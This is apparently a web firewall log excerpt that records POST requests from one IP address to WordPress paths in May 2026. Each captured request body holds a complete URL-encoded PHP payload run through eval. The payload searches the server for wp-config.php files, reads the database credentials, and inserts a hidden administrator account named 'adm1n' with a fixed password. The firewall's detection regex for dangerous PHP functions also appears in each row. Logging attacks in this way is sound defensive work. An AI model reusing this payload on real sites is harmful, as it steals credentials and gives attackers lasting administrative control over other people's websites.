20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:07:56","213.209.159.254","POST","\/wp-includes\/class-wp-term.php","Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> CmArqm:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/class-wp-term.php HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-user:?1\ncontent-length:12663\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36\nhost:dewenlabels.com\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-mobile:?1\naccept-encoding:gzip,deflate\nsec-ch-ua-platform:\"Android\"\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nupgrade-insecure-requests:1\nsec-fetch-site:none\naccept:*\/*\nsec-fetch-mode:navigate\n\nCmArqm=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 06:08:11","213.209.159.254","POST","\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> 